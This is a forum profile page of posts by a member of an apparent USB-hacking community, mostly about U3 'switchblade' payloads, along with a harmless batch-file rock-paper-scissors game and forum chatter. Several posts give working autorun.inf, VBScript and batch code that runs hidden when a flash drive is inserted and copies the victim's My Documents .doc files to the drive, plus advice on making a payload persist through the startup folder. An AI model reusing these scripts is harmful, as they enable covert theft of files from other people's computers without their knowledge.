Jump to content

GonZor

Active Members
  • Posts

    352
  • Joined

  • Last visited

Posts posted by GonZor

  1. We have finally finished our new website http://gonzor228.com. It’s been a long time since we have released anything, but in the interim period we came up with ideas on how to build the next version of the payload to better suit everyone’s needs. We think we’ll have at least a surprise or two for everyone in the next version. Keep an eye on the site for more information, we have also expanded upon the site so if you need help it should be easier to find.

  2. try starting it with a .lnk

    can you explain how ??

    u mean to start it manually instead of starting it with startup ?

    I also found out when i restart my computer then inserting the usb it dumps it to:

    C:Documents and Settings"USER NAME"

    instead of copying it to C:WINDOWS$NtUninstallKB931337$

    and this only happens after i restart the computer ....

    How can i solve this problem ?

    Thank you.

    As I said it dumps it to the working directory (which in this case would be C:Documents and Settings"USER NAME"). Instead of copying sbs.exe to the start up folder create a shortcut to sbs.exe in the start-up folder.

  3. i got another problem now  :sad:

    the hacksaw worked well ... but when i restart my computer , it doesn't work ... and i see sbs.exe in the task manager ...

    anyone faced this problem?

    The problem is sbs.exe copies the files over to its working directory then looks for send.bat in the same directory. try starting it with a .lnk and it should solve your problem (that's how i fixed it for my payload).

  4. @Volsfan91

    The VBScript you have there was written by me, the problem you have is you are using scripts that weren't made for what you want to do, you simply need the following three scripts, rather than five.

    Autorun.inf - Placed on the root of the U3 partition.

    Autorun.vbs - Placed on the root of the U3 partition.

    Slurp.bat - Placed on the root of the flash partition.

    [autorun]
    open=wscript .autorun.vbs
    

    Set objFSO = CreateObject("Scripting.FileSystemObject") 
    Set objShell = CreateObject("Wscript.Shell")
    Set colDrives = objFSO.Drives
    
    For Each objDrive in colDrives
        If objFSO.FileExists(objDrive.DriveLetter & ":slurp.bat") Then
            strPath = objDrive.Driveletter & ":slurp.bat " & objDrive.Driveletter
            objShell.Run strPath , 0, False
        End If
    Next
    
    Set objFSO = Nothing
    Set objShell = Nothing
    Set colDrives = Nothing
    

    @echo off
    mkdir %1:%computername% 
    xcopy "%userprofile%My Documents*.doc" %1:%computername% /s /c /q /r /h
    

  5. If he did use universal customizer, which I'm going to assume he did, then there is a backup made for him. Try looking in your my documents folder for a backup, its password will be the password you entered during universal customizer install. If not try booting UBCD4win and use some of their file access programs, I've found them quite useful before.

  6. With a U3 flash drive you just put the autorun.inf on the CD partition of the flash drive. This will autorun the start.bat in the flash partition similar to how a CD automatically starts an installation program. This will then open command prompt which will copy the files to the flash partition of the drive. I'm sorry if that is hard to understand. I'm not very good at explaining things and I myself am very new to this.

    That's what someone told me. Is that true? If so, that's your answer.

    In short yes it is possible to do it that way, but you would be over complicating things.

  7. I thought sable was being nasty until I read your post, I can probably tell you whats wrong, but I'll wait til you post something I can read.

    QFE

    You will find that people around here are more than willing to help if they can understand what you are trying to say, if English isnt your first language then slow down your thoughts and double check what you write to see if it makes sense.

  8. Easiest way to do it is a quick vbs

    Set objFSO = CreateObject("Scripting.FileSystemObject") 
    Set objShell = CreateObject("Wscript.Shell")
    Set colDrives = objFSO.Drives
    On Error Resume Next
    
    'Detect which drive the payload is on
    For Each objDrive in colDrives
        'ignore floppy drives - reserved by BIOS if they don't exist
        If UCase(objDrive.DriveLetter) <> "A" And UCase(objDrive.DriveLetter) <> "B" Then
            'Search for Start.bat in the root of each drive
            If objFSO.FileExists(objDrive.DriveLetter & ":start.bat") Then
                'Set strFD to the location of start.bat
                strFD = objDrive.Driveletter & ":start.bat"
            End If
        End if
    Next
    
    'Run Payload
    objShell.Run strFD, 0, False
    
    'Run Launchpad
    objShell.Run ".LaunchU3.exe -a", 0, False

    You will probably need to customize this a bit because I dont know the structure of your payload but thats the basic structure of what you will need. Obviously if you dont have the launchpad as part of your switchblade you would remove the line that starts it.

  9. Ever wondered if you could make a Rock, Paper, Scissors game in Batch? Well, its possible...


    Ok, After a suggestion by my girl I made this, it  isn't the best code. It's five minutes of work but I thought I'd share my pointless exercise with the community. Enjoy I hope you have hours of fun playing!

    @ECHO off
    
    set wins=0
    set loss=0
    set draws=0
    
    :start
    CLS
    ECHO.
    ECHO.
    ECHO -------------------------------------------------------------------------------
    ECHO.
    ECHO                           Rock, Paper, Scissors
    ECHO                                                                      By GonZor
    ECHO -------------------------------------------------------------------------------
    ECHO Wins: %wins%  Losses: %loss%  Draws: %draws%
    ECHO -------------------------------------------------------------------------------
    ECHO.
    
    SET choice=
    SET RndNum=%time:~10,1%
    IF '%RndNum%' == '0' SET comp=1
    IF '%RndNum%' == '1' SET comp=2
    IF '%RndNum%' == '2' SET comp=3
    IF '%RndNum%' == '3' SET comp=1
    IF '%RndNum%' == '4' SET comp=2
    IF '%RndNum%' == '5' SET comp=3
    IF '%RndNum%' == '6' SET comp=1
    IF '%RndNum%' == '7' SET comp=2
    IF '%RndNum%' == '8' SET comp=3
    IF '%RndNum%' == '9' SET comp=1
    
    ECHO 1. Rock
    ECHO 2. Paper
    ECHO 3. Scissors
    ECHO.
    
    SET /p choice="startect Rock, Paper or Scissors: "
    
    IF '%choice%' == '1' GOTO rock
    IF '%choice%' == '2' GOTO paper
    IF '%choice%' == '3' GOTO scissors
    IF '%choice%' == '666' (
        GOTO cool
    ) ELSE (
        GOTO start
    )
    
    :rock
    
    IF '%comp%' == '1' GOTO draw
    IF '%comp%' == '2' GOTO lose
    GOTO win
    
    :paper
    
    IF '%comp%' == '2' GOTO draw
    IF '%comp%' == '3' GOTO lose
    GOTO win
    
    :scissors
    
    IF '%comp%' == '3' GOTO draw
    IF '%comp%' == '1' GOTO lose
    GOTO win
    
    :lose
    SET /a loss=%loss% + 1
    CLS
    ECHO.
    ECHO.
    ECHO -------------------------------------------------------------------------------
    ECHO.
    ECHO                                   YOU LOSE!
    ECHO.
    ECHO -------------------------------------------------------------------------------
    PAUSE
    GOTO start
    
    :win
    SET /a wins=%wins% + 1
    CLS
    ECHO.
    ECHO.
    ECHO -------------------------------------------------------------------------------
    ECHO.
    ECHO                                    YOU WIN!
    ECHO.
    ECHO -------------------------------------------------------------------------------
    PAUSE
    GOTO start
    
    :draw
    SET /a draws=%draws% + 1
    CLS
    ECHO.
    ECHO.
    ECHO -------------------------------------------------------------------------------
    ECHO.
    ECHO                                      DRAW!
    ECHO.
    ECHO -------------------------------------------------------------------------------
    PAUSE
    GOTO start
    
    :cool
    SET /a wins=%wins% + 666
    CLS
    ECHO.
    ECHO.
    ECHO -------------------------------------------------------------------------------
    ECHO.
    ECHO                                  YOU'RE AWESOME!!
    ECHO.
    ECHO -------------------------------------------------------------------------------
    PAUSE
    GOTO start


    [me=GonZor]got bored  :-([/me]

    And about the '666', she wanted a cheat :P

    EDIT - Just added a wins/losses/draws summary. Thanks to Marcs request.

  10. I don't know what I'm doing wrong. Can someone more experienced give me a hand?

    autorun.inf

    [autorun] 
    action=Open Files On Folder
    icon=iconsdrive.ico
    shellexecute=nircmd.exe execmd CALL start.bat

    start.bat

    xcopy "C:Documents and Settings%username%My Documents*.doc" /s/c/q/r/h

    In start.bat you are missing the destination, it should look more like this

    XCOPY [source] [destination] (arguments)

    If you need a better explanation open a command prompt and type XCOPY /?

  11. don't bother learning VB as  its useless (ok thats highly opinionated).

    Dam right that's highly opinionated :P

    VB ain't that useless if you know how to use it properly, I admit its not the most powerful language but its a useful language for shitting out small apps you may only use a few times, considering it takes almost no time to make them.

  12. Seeing as batch files are wonderful things in of themselves, this 2007 and I want my eyecandy output. So, with or without the community's permission I'm re-writing the switchblade batch file in vbs. Why because vbs is much more powerful then batch files and also gives me the ability to easily manipulate text files and munge them into the html I'm looking for.

    Firstly nice work on modifying the payload, Secondly the way I see the USB Hacks section is a community project where people build upon others ideas to create something bigger and better. I doubt anyone would object to you rewriting the batchfiles in vbs. Once your done let me know and with your approval it may make its way into the payload, Also if you get stuck I can help.

  13. Note for Matatron: It is really easy to write one line but this is called work and really hacking. lol otherwise there are bunch of website where we can just get the password of any hash key within 5 second. So if you dont know the answer than its better to hide your a**.

    I get the feeling you don't know much about metatron... Run while you still have legs  :shock:

  14. P.S. (VERY UNRELATED)  Oh and K1u congratulations.  You have managed to get as many posts as I have posted in just over two months, I am ten days away from my one year anniversary on the forums (yes I expect gifts from everyone on the forum celebrating my anniversary). 

    It took him 2 months to achieve what you did in 1 year, how long until you match his karma rating? :P

  15. Moonlit was right, I should've explained why I changed to that but I figured most people would understand.

    I'd still like to know why VB didn't like that code?

  16. Reinstall. Reinstall. Reinstall.

    *Backup. Reinstall. Reinstall. Reinstall.

    Send for Ubutnu disk, fdisk.

    :P DBAN Drive, install favorite Linux distro :D

    yes becasue if you dont erase and write to the entire disk many many times the virus will still infect your computer

    Especially when your using a completely different operating system.

  17. vb did not like that for some reason i am useing vb6 by the way

    How did VB not like that? What was the error?

    When asking for help you have to remember we only know what you tell us, so the more information you give the easier it is for us to help you.

×
×
  • Create New...